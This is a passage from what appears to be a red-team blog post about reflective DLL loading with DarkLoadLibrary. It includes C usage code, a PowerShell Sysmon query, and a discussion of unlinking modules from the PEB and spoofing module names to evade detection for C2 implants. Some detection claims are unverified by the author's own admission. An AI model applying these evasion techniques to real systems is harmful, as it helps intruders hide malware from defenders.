PDARKMODULE DarkModule = DarkLoadLibrary(dwFlags, lpwBuffer, lpFileBuffer, dwLen, lpwName);

if (DarkModule->bSuccess == FALSE)
{
    printf("[!] %S\n", DarkModule->ErrorMsg);
    pHeapFree(pGetProcessHeap(), 0, DarkModule->ErrorMsg);
    pHeapFree(pGetProcessHeap(), 0, DarkModule);
    return -1;
}

printf("  :: Module: %p\n", (HMODULE)DarkModule->ModuleBase);

if (pHeapFree(pGetProcessHeap(), 0, DarkModule->ErrorMsg))
{
    printf("  :: Freed DarkModule->ErrorMsg\n");
}
else
{
    printf("[!] Failed to free DarkModule->ErrorMsg!\n");
}
if (pHeapFree(pGetProcessHeap(), 0, DarkModule))
{
    printf("  :: Freed DarkModule\n");
}
else
{
    printf("[!] Failed to free DarkModule\n");
}

DarkLoadLibrary() will return a struct of PDARKMODULE:

typedef struct _DARKMODULE {
    BOOL      bSuccess;
    LPWSTR    ErrorMsg;
    PBYTE     pbDllData;
    DWORD     dwDllDataLen;
    LPWSTR    LocalDLLName;
    PWCHAR CrackedDLLName;
    ULONG_PTR ModuleBase;
    BOOL        bLinkedToPeb;
} DARKMODULE, *PDARKMODULE;

Depending on the options provided, DarkLoadLibrary will do a few things:

  1. IsValidPE(): Checks to see if e_lfanew is in the IMAGE_NT_HEADERS. If it is, check if the Signature is IMAGE_NT_SIGNATURE.

  2. MapSections(): This function does a lot, and is worth a read, but essentially it is mapping the DLL Sections and ensure that all the relocations are handled correctly.

  3. ResolveImports(): Does what is says on the tin. Resolves LoadLibraryA and ensures the DLL has all its imports correctly resolved.

  4. LinkModuleToPEB(): If NO_LINK is not specified, this function will use LDR_DATA_TABLE_ENTRY2 and AddBaseAddressEntry() to link the module. This is also the function used to spoof the DLL Name.

  5. BeginExecution(): This is the actual point of execution, and again, a lot is going on here and is worth reading. But, the purpose of this is the following:

BOOL ok = DllMain(
    (HINSTANCE)pdModule->ModuleBase,
    DLL_PROCESS_ATTACH,
    (LPVOID)NULL
);

Experimenting with DarkLoadLibrary

The little tool I put together for this is dark-loader. It works off both modes offered for loading a DLL, and then takes in a DLL path. This allowed me to quickly verify various DLLs worked with the libary.

Here is the help:

Lets quickly make sure it works across all the use cases:

  1. Standard DLL: LOAD_LOCAL_FILE

  1. Reflective DLL: LOAD_LOCAL_FILE

  1. Standard DLL: LOAD_MEMORY

  1. Reflective DLL: LOAD_MEMORY

DarkLoadLibrary was able to execute both the standard and Reflective DLL from both the local disk and from memory without any issues!

ImageLoad and Linked Modules

The final thing I want to do is quickly go back over the Sysmon Event ID 7 and the PEB Linked Modules.

Updating the PowerShell script for the $loader and the $dll:

$eventId = 7
$logName = "Microsoft-Windows-Sysmon/Operational"

$loader = "dark-loader.exe"
$dll = "debug-dll.dll"

$Yesterday = (Get-Date).AddHours(-1)
$events = Get-WinEvent -FilterHashtable @{logname=$logName; id=$eventId ;StartTime = $Yesterday;}

$date = Get-Date -Format "yyyy-MM-dd HH"

foreach($event in $events)
{
    $msg = $event.Message.ToString()
    $image = ($msg|Select-String -Pattern 'Image:.*').Matches.Value.Replace("Image: ", "")
    $imageLoaded = ($msg|Select-String -Pattern 'ImageLoaded:.*').Matches.Value.Replace("ImageLoaded: ", "")
    $utcTime = ($msg|Select-String -Pattern 'UtcTime:.*').Matches.Value.Replace("UtcTime: ", "")
   
    if($image.contains($loader) -and $imageLoaded.Contains($dll))
    {
        Write-Host $image loaded $imageLoaded at $utcTime
    }
}

LOAD_LOCAL_FILE

The next screenshot provides no reason to believe this is correct, but no events were found:

The only other way I could prove this is to provide logs or an awkward screenshot of times. But I can't be bothered, so trust me bro.

Checking the linked modules, debug-dll.dll is present:

DarkLoadLibrary also supports NO_LINK, which should remove the above:

dwFlags = LOAD_LOCAL_FILE | NO_LINK;

The DLL executes and the debug-dll cannot be seen:

LOAD_MEMORY

Again, no logs found, but trust me bro:

Arbitrary DLL Naming:

Conclusion

Throughout this blog I've been exploring loading DLLs into memory. This covered loading a standard Windows DLL, a custom DLL (MessageBoxA ftw), and Reflective DLLs. My goal was to identify an OpSec way of loading modules into memory and the conclusion I've came to is that if the DLL needs to be loaded into a remote process, then the sRDI project (or something similar) is probably the best way. As for the local process, I cannot see any reason to not take inspiration from BatSec's DarkLoadLibrary and utilise a custom loader. The flexibility to load from both disk and memory, as well as supplying a 'spoofed' module name, currently, seems unparalleled.

Hopefully I get around to it, but I want to do a follow-up blog to this where I go over a project I've had for a while which piles onto the C2 Twitter debate by showcasing a method of keeping a small implant that works well with modularity.

For all the projects used here, see the Pantry.

Last updated